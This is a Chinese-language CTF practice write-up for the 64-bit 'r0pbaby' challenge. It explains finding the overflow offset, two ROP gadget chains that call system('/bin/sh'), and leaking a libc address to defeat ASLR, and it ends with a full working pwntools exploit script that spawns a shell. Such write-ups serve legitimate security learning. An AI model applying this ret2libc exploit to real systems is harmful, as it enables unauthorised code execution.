pwn練習-r0pbaby

經典的rop利用題目

作為一枚菜雞，希望能從基礎開始多學點東西

首先file指令檢視檔案類型為64位程式

image.png

用checksec檢視開啟的保護，可以看到，開啟了堆棧不可執行、位址分布随機化

執行程式，有以下這些選項

選項1給出libc的位址

選項2給出libc其中一個函數的位址

選項3可以向棧中輸入小于1024的任意資料

首先測試溢出點

通過peda自帶的pattern_create和pattern_offset進行溢出填充位數判斷

可以得到溢出填充位為8位元組，之後緊接着就是ret的位址，可以進行覆寫

在這裡一般思路就是覆寫為system或者其他可以執行系統指令的函數位址，使得可以getshell

需要注意的是，64位系統中通過寄存器傳參，函數傳參順序是RDI,RSI,RDX,RCX,R8,R9

調用system等函數時需要先給RDI寄存器指派參數内容'/bin/sh'

使得最後執行system('/bin/sh')，是以需要構造棧布局

這裡有兩種ROP的利用方法

0x01

首先是考慮先指派RDI内容為'/bin/sh'，之後再調用system函數

是以在這裡需要找到gaget

這樣我們的payload如下所示：

payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
           

ret到

pop rid ; ret

的位址進行執行，将棧中sh_addr（'/bin/sh'的位址）傳到RDI寄存器，接着ret到system_addr（sysem函數的位址）執行shell

0x02

還可以通過找到先pop寄存器，然後直接call寄存器的gaget來利用

這樣的利用棧布局就如下payload所示

payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)
           

pop rax ; pop rdi ; call rax

，将棧中system_addr傳到RAX寄存器，将sh_addr傳到RDI寄存器，之後直接CALL RAX來執行shell

payload和棧布局找好了，接下來就是寫腳本利用了

還需要得到system在libc中的位址和'/bin/sh'字元串的位址

而'/bin/sh'在libc中已經存在了，可以通過Winhex查找，也可以通過IDA查找，這裡注意，找到的是offset address

在IDA中按shift+f12，再通過ctrl+f搜尋也可以找到

system的記憶體加載位址可以通過程式的選項2直接擷取，再通過system在libc中固定的偏移位址，就可以得到libc的實際加載位址，并且能夠獲得其他所有函數和'/bin/sh'的實際加載位址。可以使用pwntools工具來擷取offset address

from pwn import *
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")

system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
           

拿到system的實際位址和偏移位址offset addr之後，就可以拿到'/bin/sh'的實際位址

sh_addr = system_addr + sh_offset - system_offset
           

最後system和'/bin/sh'的位址都拿到，兩種payload都可以生效

from pwn import *

p = process("./r0pbaby")
elf = ELF("r0pbaby")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

system_offset = libc.symbols['system']
sh_offset = 0x179ef5

bss_addr = elf.bss()
pop_rdi_ret_offset = 0x00000000000208ef
ppc_addr_offset = 0x00000000000f53eb

p.recvuntil(": ")
p.sendline("1")
libc_addr = p.recvline().split(": ")[1].strip("\n")
libc_addr = long(libc_addr,16)
print "libc_addr:%x" % libc_addr

p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")

system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
sh_addr = system_addr + sh_offset - system_offset
pop_rdi_ret = system_addr + pop_rdi_ret_offset - system_offset
ppc_addr = system_addr + ppc_addr_offset - system_offset
print "system_addr:%x" % system_addr
print "base_addr:%x" % (system_addr - system_offset)

p.recvuntil(": ")
p.sendline("3")
p.recvuntil(": ")


#payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr) 
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
length = str(len(payload))
print length
print payload
p.sendline(length)
p.sendline(payload)
p.recv()

p.interactive()

           

ps:

一開始寫腳本直接用選項1的位址做libc基位址來加上偏移，發現怎麼都是錯的

選項1給出的位址不是libc的基位址，需要用選項2的函數位址洩露來算出libc的基位址